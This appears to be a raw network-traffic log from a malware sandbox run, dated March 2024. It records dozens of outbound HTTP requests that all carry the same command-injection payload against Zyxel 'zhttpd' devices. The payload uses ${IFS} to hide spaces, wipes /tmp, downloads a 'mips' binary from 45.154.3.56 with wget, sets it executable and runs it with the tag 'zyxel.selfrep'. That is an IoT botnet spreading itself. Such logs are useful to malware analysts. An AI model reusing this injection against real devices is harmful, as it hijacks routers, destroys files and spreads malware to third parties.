                        Mar 12, 2024 08:50:32.090610027 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1440192.168.2.1439506156.195.224.221443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.090645075 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1441192.168.2.1456406122.24.220.39443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.090692997 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1442192.168.2.1450430146.99.55.227443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.090734959 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1443192.168.2.144578631.87.190.241443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.090786934 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1444192.168.2.1449208196.76.117.210443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.090826988 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1445192.168.2.144450642.64.170.20443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.090873003 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1446192.168.2.1448236153.85.240.167443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.090929985 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1447192.168.2.1433568189.182.254.240443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.090971947 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1448192.168.2.146057057.62.185.162443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.091002941 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1449192.168.2.1442024159.133.71.137443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.091042995 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1450192.168.2.1440752110.66.253.129443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.091089964 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1451192.168.2.145375449.237.248.47443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.091128111 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1452192.168.2.1455898164.149.224.106443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.091181993 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1453192.168.2.143482846.131.153.109443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.091227055 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1454192.168.2.1459200208.60.90.89443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.091274023 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1455192.168.2.1451098199.189.145.74443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.091305971 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1456192.168.2.1437430179.120.171.242443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.091348886 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1457192.168.2.1443780137.58.40.155443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.091379881 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1458192.168.2.1459124170.51.198.160443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.091439009 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1459192.168.2.1454560202.164.2.54443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.091478109 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1460192.168.2.1440524157.156.123.91443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.091531992 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1461192.168.2.145099089.165.88.70443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.091532946 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1462192.168.2.144734048.195.151.14443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.091572046 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1463192.168.2.1440550159.53.3.174443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.091634035 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1464192.168.2.1456352133.246.131.238443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.091674089 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1465192.168.2.1435252146.141.109.165443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.091694117 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1466192.168.2.1448192104.103.64.146443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.091725111 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1467192.168.2.1446898217.78.50.112443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.091782093 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1468192.168.2.145103034.198.115.213443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.091824055 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1469192.168.2.1444522143.83.234.47443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.091876030 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1470192.168.2.1453542139.193.222.1443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.091902018 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1471192.168.2.1445824124.10.236.229443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.091979980 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1472192.168.2.143862837.186.181.0443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.092027903 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1473192.168.2.145130881.89.204.226443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.092065096 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1474192.168.2.143753663.1.152.25443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.092108965 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1475192.168.2.1446516223.41.45.23443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.092152119 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1476192.168.2.144196624.172.108.220443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.092190981 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1477192.168.2.14518149.40.99.79443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.092236042 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1478192.168.2.145591860.130.133.173443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.092288017 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1479192.168.2.1444180170.213.57.213443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.092339039 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1480192.168.2.144548642.146.214.143443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.092381001 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1481192.168.2.14420768.34.147.203443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.092415094 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1482192.168.2.145914814.170.126.244443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.092447996 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1483192.168.2.1459844174.15.34.139443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.092468023 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1484192.168.2.1446688138.137.97.200443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.092516899 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1485192.168.2.1458106201.226.67.115443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.092551947 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1486192.168.2.144916441.77.18.82443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.092605114 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1487192.168.2.14579648.72.130.232443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.092658997 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1488192.168.2.1435448190.213.9.58443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.092674971 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1489192.168.2.144040857.18.19.175443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.092705011 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1490192.168.2.143749871.110.7.24443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.092761040 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1491192.168.2.145446032.46.251.196443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.092789888 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1492192.168.2.1456844169.179.12.52443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.092843056 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1493192.168.2.1445338167.20.55.166443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.092890024 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1494192.168.2.144277078.132.219.59443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.092916965 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1495192.168.2.1436352147.252.119.155443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.092979908 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1496192.168.2.1447636219.253.221.201443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.093025923 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1497192.168.2.1440412200.64.4.131443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.093080997 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1498192.168.2.144611481.55.13.84443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.093122005 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1499192.168.2.1453384182.176.187.176443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.093148947 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1500192.168.2.145634232.23.39.16443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.093168974 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1501192.168.2.1438350132.91.80.89443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.093224049 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1502192.168.2.144088234.71.165.113443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.093266964 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1503192.168.2.1447632122.88.195.133443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.093308926 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1504192.168.2.1455160106.241.43.125443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.093352079 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1505192.168.2.145001685.106.144.24443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.093400955 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1506192.168.2.1455228186.204.249.25443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.093437910 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1507192.168.2.1432996209.221.65.145443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.093478918 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1508192.168.2.1446662111.209.36.194443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.093523979 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
